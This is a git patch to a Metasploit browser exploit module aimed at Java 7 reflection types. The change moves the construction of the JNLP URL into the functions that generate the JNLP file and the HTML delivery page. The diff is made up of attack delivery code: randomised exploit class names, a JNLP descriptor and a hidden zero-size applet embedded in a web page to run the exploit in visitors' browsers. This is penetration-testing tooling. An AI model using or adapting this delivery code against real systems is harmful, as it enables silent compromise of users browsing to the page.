From 8eea476cb87c2eb11bacc5863ba9a3ba43bc19ae Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 25 Apr 2013 10:28:34 -0500
Subject: [PATCH] Build the jnlp uri when resource is available

---
 .../browser/java_jre17_reflection_types.rb    | 19 +++++++++++++------
 1 file changed, 13 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
index f427c4851d..124242eeda 100644
--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -93,17 +93,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		@exploit_class_name = rand_text_alpha("Exploit".length)
 		@exploit_class.gsub!("Exploit", @exploit_class_name)
 
-		@jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
-		@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
-		@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
+		@jnlp_name = rand_text_alpha(8)
 
 		super
 	end
 
 	def jnlp_file
-		%Q|
+		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+
+		jnlp = %Q|
 <?xml version="1.0" encoding="utf-8"?>
-<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
 	<information>
 		<title>Applet Test JNLP</title>
 		<vendor>#{rand_text_alpha(8)}</vendor>
@@ -121,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	<update check="background"/>
 </jnlp>
 		|
+		return jnlp
 	end
 
 	def on_request_uri(cli, request)
@@ -161,11 +164,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
+		jnlp_uri  = ((datastore['SSL']) ? "https://" : "http://")
+		jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+		jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
+
 		html = %Q|
 		<html>
 		<body>
 		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
-		<param name="app" value="#{@jnlp_uri}">
+		<param name="app" value="#{jnlp_uri}">
 		<param name="back" value="true">
 		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
 		</object>